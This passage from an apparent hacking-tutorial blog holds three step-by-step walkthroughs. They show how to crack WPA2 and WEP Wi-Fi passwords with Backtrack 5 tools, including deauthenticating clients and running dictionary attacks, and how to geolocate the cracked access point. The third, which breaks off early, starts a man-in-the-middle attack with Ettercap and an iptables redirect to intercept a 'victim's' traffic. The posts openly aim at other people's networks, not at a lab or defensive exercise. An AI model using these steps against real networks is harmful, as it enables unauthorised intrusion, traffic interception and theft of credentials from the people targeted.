<span style="color: purple; font-size: large;">select the wireless interface from the list.</span></div>
<span style="color: purple; font-size: large; text-align: center;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Zic-tsSJSxc/UE-bbgzhSRI/AAAAAAAAAOM/Sj_ra6ZjzVY/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://1.bp.blogspot.com/-Zic-tsSJSxc/UE-bbgzhSRI/AAAAAAAAAOM/Sj_ra6ZjzVY/s640/2.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">when you select your card, a window will open ...ignore it... just to OK</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-eh7Kee1qJ7w/UE-b6QBP_8I/AAAAAAAAAOU/0EfuUXkzFP4/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://1.bp.blogspot.com/-eh7Kee1qJ7w/UE-b6QBP_8I/AAAAAAAAAOU/0EfuUXkzFP4/s640/1.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<span style="color: purple; font-size: large; text-align: center;">double click anywhere on the tool to get the settings... and then enable the xterm from there... (the window appeared above was just informing you about the "settings" ) </span><br />
<span style="color: purple; font-size: large; text-align: center;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ym0382iQgfI/UE-b8Q3DaOI/AAAAAAAAAOc/A9e4hJIqigE/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://2.bp.blogspot.com/-ym0382iQgfI/UE-b8Q3DaOI/AAAAAAAAAOc/A9e4hJIqigE/s640/2.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<div style="text-align: center;">
<span style="color: purple; font-size: large;">now click on the button with the wifi logo on it, the scanning will start when you click it..</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
</div>
<div style="text-align: center;">
<br />
<div style="text-align: center;">
<span style="color: purple; font-size: large;">now you will be able to see the xterms running WEP & WPA scanning (its using airodump)</span></div>
<span style="color: purple; font-size: large;"></span><br />
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<span style="color: purple; font-size: large;">
*in the pic i actually closed the xterm for wep..</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-HUkNRrVwHgY/UE-cW2QlcwI/AAAAAAAAAOk/-1vNUm_JsmU/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://4.bp.blogspot.com/-HUkNRrVwHgY/UE-cW2QlcwI/AAAAAAAAAOk/-1vNUm_JsmU/s640/1.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">now click on the button which says "WPA"..when you do that, a window will open..</span><span style="color: purple; font-size: large;">just click the AP from the List and then select a wordlist for the WPA2 CCMP cracking (dictionary attack)</span></div>
<div style="text-align: start;">
</div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">select a client which you want to disconnect (deauth) from the AP through the list.</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">and now run "Attack"</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-59TXK8zEnDU/UE-ca786R-I/AAAAAAAAAOs/9XVZBtErwYY/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://2.bp.blogspot.com/-59TXK8zEnDU/UE-ca786R-I/AAAAAAAAAOs/9XVZBtErwYY/s640/2.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<span style="color: purple; font-size: large; text-align: center;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ALk3jj3P1Ug/UE-cc8zUVCI/AAAAAAAAAO0/Zc9Iw73RIIo/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://2.bp.blogspot.com/-ALk3jj3P1Ug/UE-cc8zUVCI/AAAAAAAAAO0/Zc9Iw73RIIo/s640/3.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">after few seconds (or minutes) you can see one xterm appering which is sniffing the AP (actually waiting for the WPA handshake) and another xterm appearing for every 3-4 seconds (this xterm is trying to deauthenticate the client by sending the "Deauth" packet)</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-UiIEj4msRFY/UE-ce7C8KII/AAAAAAAAAO8/ioqkI4grLmg/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://2.bp.blogspot.com/-UiIEj4msRFY/UE-ce7C8KII/AAAAAAAAAO8/ioqkI4grLmg/s640/4.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-bPNCBAOSbf0/UE-chBfKwnI/AAAAAAAAAPE/gv65XzT-tc8/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://4.bp.blogspot.com/-bPNCBAOSbf0/UE-chBfKwnI/AAAAAAAAAPE/gv65XzT-tc8/s640/5.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<span style="color: purple; font-size: large; text-align: center;">now when you get the WPA-handshake, the tool will start the dictionary attack automatically and if the password is there in the wordlist then it will be displayed on the window..</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-wmLNgKqRM6w/UE-cjczy8YI/AAAAAAAAAPM/QXpgIcsyN08/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://4.bp.blogspot.com/-wmLNgKqRM6w/UE-cjczy8YI/AAAAAAAAAPM/QXpgIcsyN08/s640/6.jpg" width="640" /></a></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">ok this is it for WPA2 CCMP cracking... i hope you liked it... </span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<br /></div>
Abyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com1tag:blogger.com,1999:blog-9021539595109195852.post-53101412290584343852012-09-10T21:54:00.001+05:302013-09-23T17:42:27.809+05:30[TUT] WEP cracking using fern-wifi-cracker in bt5 r3 [TUT]<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;">hey guys...</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">today i tried a new tool on <b>Backtrack 5 R3</b> ... its called "<b>fern-wifi-cracker</b>" </span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">this tool is really good...so i thought i should make a tut on this...</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">so lets begin ...</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">go to backtrack --> exploitation tools --> wireless exploitation tools --> WLAN exploitation --> fern-wifi-cracker</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-lKWjPB2yYL0/UE4Az6Dm4ZI/AAAAAAAAAMw/Ut9uXVKtSwc/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="476" src="http://4.bp.blogspot.com/-lKWjPB2yYL0/UE4Az6Dm4ZI/AAAAAAAAAMw/Ut9uXVKtSwc/s640/1.jpg" width="640" /></span></a></div>
<br />
<br />
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;">now select the wireless interface you have ( it can be wlan0, wlan1 etc..)</span></div>
<span style="color: red; font-size: large;"><br class="Apple-interchange-newline" /></span>
<span style="color: red; font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-rtPj3VCDCeY/UE4A09g6miI/AAAAAAAAAM4/p5G8VQqiZeM/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="478" src="http://2.bp.blogspot.com/-rtPj3VCDCeY/UE4A09g6miI/AAAAAAAAAM4/p5G8VQqiZeM/s640/2.jpg" width="640" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="color: red; font-size: large;">now there's a button on which you can see wifi logo, click that and it will start the network scanning ( of-course its using airodump here).</span><br />
<span style="color: red; font-size: large;"><br /></span>
<span style="color: red; font-size: large;">*note: if you double-click anywhere in the tool, you'll get a "settings" dialog box... you can set the channel there and also you can start the xterm.</span><br />
<span style="color: red; font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-oy6wZYU1f-8/UE4A16MFI-I/AAAAAAAAANA/W-hRH3edm04/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="478" src="http://4.bp.blogspot.com/-oy6wZYU1f-8/UE4A16MFI-I/AAAAAAAAANA/W-hRH3edm04/s640/3.jpg" width="640" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="color: red; font-size: large;">Now if you see closely, you'll note that the two buttons below the scan button will get enabled, the first button is the WEP cracking button and the second one is for WPA cracking.</span><br />
<span style="color: red; font-size: large;"><br /></span>
<span style="color: red; font-size: large;">click the button for WEP cracking </span><br />
<span style="color: red; font-size: large;"><br class="Apple-interchange-newline" /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-OOHi1mXrkaI/UE4A3Iq2gEI/AAAAAAAAANI/xKMil7ENHSQ/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="478" src="http://1.bp.blogspot.com/-OOHi1mXrkaI/UE4A3Iq2gEI/AAAAAAAAANI/xKMil7ENHSQ/s640/4.jpg" width="640" /></span></a></div>
<br />
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">after clicking that button, a new dialog box will open. you can select the wep network from the list and then you can select the type of attack i.e arp replay attack, chop-chop attack or fragmentation attack. then click "Attack"...</span></div>
<br />
<span style="color: red; font-size: large;"><br /></span>
<span style="color: red; font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-mcElxObphu4/UE4A4IazeUI/AAAAAAAAANQ/qcia2qqhKPw/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="478" src="http://4.bp.blogspot.com/-mcElxObphu4/UE4A4IazeUI/AAAAAAAAANQ/qcia2qqhKPw/s640/5.jpg" width="640" /></span></a></div>
<br />
<span style="color: red; font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;">you'll be able to see the number of ivs are increasing. there's a progress bar at the end of the dialog box. when the progress bar reaches the end, this tool starts aircrack for cracking wifi password.</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-703V8cJPTbw/UE4A5AbY2JI/AAAAAAAAANU/iOw4eSrpZo8/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="478" src="http://4.bp.blogspot.com/-703V8cJPTbw/UE4A5AbY2JI/AAAAAAAAANU/iOw4eSrpZo8/s640/6.jpg" width="640" /></span></a></div>
<br />
<span style="color: red; font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;">when the password is cracked, it will be shown at the bottom of the dialog box...</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">NOW COMES THE INTERESTING PART: </span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">(before going further, i suggest you to connect to the internet for this)</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">go to "toolbox" --> Geolocatory tracker.</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<span style="color: red; font-size: large;"><br class="Apple-interchange-newline" /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-57LbFwMOilc/UE4A5mID9-I/AAAAAAAAANg/KEnJu9LTAXk/s1600/7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="358" src="http://1.bp.blogspot.com/-57LbFwMOilc/UE4A5mID9-I/AAAAAAAAANg/KEnJu9LTAXk/s640/7.jpg" width="640" /></span></a></div>
<br />
<span style="color: red; font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;">give the bssid of the AP in the text box and click "Trace".</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-_FKt_XdIdBA/UE4A68u5Y0I/AAAAAAAAANo/Q77RVwwpx28/s1600/8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="358" src="http://2.bp.blogspot.com/-_FKt_XdIdBA/UE4A68u5Y0I/AAAAAAAAANo/Q77RVwwpx28/s640/8.jpg" width="640" /></span></a></div>
<br />
<span style="color: red; font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;">i think everyone has already guessed what it will show...</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">YES... INDEED... IT WILL SHOW YOU THE LOCATION OF THE AP ON THE GOOGLE MAPS ... you can see the coordinates as well..</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<span style="color: red; font-size: large;"><br class="Apple-interchange-newline" /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-jFhC-ThmnZ8/UE4A8Yhpc9I/AAAAAAAAANw/ZQwTTYdmZLo/s1600/9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="358" src="http://3.bp.blogspot.com/-jFhC-ThmnZ8/UE4A8Yhpc9I/AAAAAAAAANw/ZQwTTYdmZLo/s640/9.jpg" width="640" /></span></a></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">and also you can see in the toolbox, there's a button for cookie hijacking called "cookie hijacker" ..</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">ok guys so that's it for now... :-)</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">PM me if you need any help in this :)</span></div>
<div style="text-align: center;">
<br /></div>
Abyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com0tag:blogger.com,1999:blog-9021539595109195852.post-10639497681921408282012-06-29T00:44:00.000+05:302013-09-23T17:41:07.524+05:30WIRELESS MITM ATTACK (INTERCEPTING THE DATA)<br />
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>In this tutorial i'll show how can you intercept the data when the victim is communicating ....</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>ok but before we get started there are certain requirements which is necessarily:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>1) Backtrack 5 R2 (am using R2 , if you have R1 then no problem ) :-)</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>2) Connection with the victim's Wireless Network </i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>TOOLS WHICH ARE USED IN THE PROCESS:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>1) Ettercap</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>2) Burpsuite </i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>For those who didnt cracked the wireless password of the victim, i suggest you to first read the cracking tutorial and then this.</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>i can suggest you some tools (good) for wireless cracking:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>1) Airecrack Tool</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>2) Gerix-wifi-Cracker Tool</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>3) Airoscript Tool</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>ALL THREE ARE INTEGRATED WITH BACKTRACK 5 R2</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>SO LETS GET STARTED !!</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: blue; font-size: x-large;"><b><i>STEP 1</i></b></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>we have to configure the ettercap.conf file before starting the ettercap...why? because by-default ettercap will not sniff on "wlan0" interface.</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>so to configure the file, go to terminal and type this</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<i><span class="Apple-tab-span" style="background-color: white; color: red; white-space: pre;"> </span><span style="background-color: white; color: purple; font-size: large;"><b>vim /etc/etter.conf </b></span></i></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>now keep scrolling down until you find this code:</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#---------------</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i># Linux</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#---------------</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i># if you use ipchains:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rp$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %r$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i># if you use iptables:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRE$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIR$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>change it to :</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#---------------</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i># Linux</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#---------------</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i># if you use ipchains:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rp$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %r$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i># if you use iptables:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRE$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIR$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-q6k_uI5jhY4/T-yT5gaeA1I/AAAAAAAAAJw/E8XohfmclpM/s1600/conf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: red;"><i><img border="0" height="356" src="http://4.bp.blogspot.com/-q6k_uI5jhY4/T-yT5gaeA1I/AAAAAAAAAJw/E8XohfmclpM/s640/conf.png" width="640" /></i></span></a></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>save & close it.</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: blue; font-size: x-large;"><b><i>STEP 2</i></b></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>(If you guys already know how to do a normal MITM then skip this step)</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>start ettercap</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-JxVa4Y3HaX8/T-yU6R-9BwI/AAAAAAAAAJ4/y96uDjWNuGc/s1600/1.png" imageanchor="1"><span style="background-color: white; color: red;"><i><img border="0" height="358" src="http://3.bp.blogspot.com/-JxVa4Y3HaX8/T-yU6R-9BwI/AAAAAAAAAJ4/y96uDjWNuGc/s640/1.png" width="640" /></i></span></a></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i><br /></i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i><br /></i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>goto SNIFF-->UNIFIED SNIFFING</i></span></div>
<div style="text-align: center;">
</div>
<div style="text-align: center;">
</div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><a href="http://1.bp.blogspot.com/-nSAT8psp75U/T-ybliMrkdI/AAAAAAAAALI/gFLuj5G0sYc/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><i><img border="0" height="358" src="http://1.bp.blogspot.com/-nSAT8psp75U/T-ybliMrkdI/AAAAAAAAALI/gFLuj5G0sYc/s640/2.png" width="640" /></i></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>select N/W Interface ---> wlan0 --> OK</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-U1xdrFAaqVg/T-ydGQuKtKI/AAAAAAAAALY/nP7Y9D_3FRg/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><span style="background-color: white; color: red;"><i><img border="0" height="358" src="http://2.bp.blogspot.com/-U1xdrFAaqVg/T-ydGQuKtKI/AAAAAAAAALY/nP7Y9D_3FRg/s640/4.png" width="640" /></i></span></a></div>
<br />
<div style="text-align: center;">
</div>
<br />
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>(wlan0 is my wireless interface. check yours and then add.)</i></span></div>
<div style="text-align: center;">
